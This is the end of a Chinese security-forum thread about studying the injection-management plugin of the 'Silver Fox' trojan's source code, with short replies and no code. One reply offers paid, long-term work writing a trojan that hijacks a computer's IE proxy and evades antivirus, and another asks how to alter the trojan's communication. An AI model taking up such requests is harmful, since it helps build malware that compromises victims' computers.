4fbK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6E0M7q4)9J5k6i4N6W2K9i4S2A6L8W2)9J5k6i4q4I4i4K6u0W2j5$3!0E0i4K6u0r3M7#2)9J5c8V1c8F1d9r3u0K9y4g2)9J5k6r3A6E0i4K6u0V1P5W2N6h3c8s2q4v1c8#2N6m8b7$3#2m8
银狐木马插件源码学习之注入管理

最后于 2024-12-13 10:35 被mb_vdaqkotg编辑 ,原因: 写错了
2024-12-13 10:32
0
mb_mqcpjtlj
雪    币: 288
活跃值: (150)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
18
写一个马改变锁定电脑IE代理地址
并且不被杀毒软件清理
待遇丰厚  可长期合作  会的联系我
感谢????楼主
2025-1-11 00:55
0
hbwa486
雪    币: 122
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
私信
19
弱弱问下,动态和通讯怎么改,谁有教程
2025-7-7 20:12
0
mb_fopjuexb
雪    币: 1
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
私信
20
编译一堆错误
2025-9-30 18:21
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回